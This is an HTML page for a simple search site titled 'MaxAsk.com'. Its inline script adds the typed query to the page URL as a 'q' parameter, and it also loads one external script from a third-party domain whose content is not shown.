<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MaxAsk.com</title>
    <style>
        body {
            background-color: #f2f2f2;
            font-family: Arial, sans-serif;
        }

        /* Add styles for the search box */
        .search-container {
            position: absolute;
            top: 100px;
            left: 50%;
            transform: translateX(-50%);
            z-index: 15;
        }

        #search-box {
            padding: 10px;
            width: 300px;
            font-size: 16px;
        }

        #search-button {
            padding: 10px 20px;
            font-size: 16px;
            cursor: pointer;
        }
    </style>
</head>

<body>
    <div class="search-container">
        <form id="search-form">
            <input type="text" id="search-box" placeholder="Enter your search query">
            <button type="submit" id="search-button">Search</button>
        </form>
    </div>
    <script src="https://trivalento.info/yorvil?i=GH3HP8ZREP&atr=1234"></script>
    <script>
        document.getElementById('search-form').addEventListener('submit', function (e) {
            e.preventDefault();
            var query = document.getElementById('search-box').value;
            if (query) {
                const href = window.location.href
                const url = new URL(href)
                const searchParams = new URLSearchParams(url.search)
                searchParams.set('q', query)
                url.search = searchParams.toString()
                window.location.href = url.toString()
            }
        });
    </script>
</body>

</html>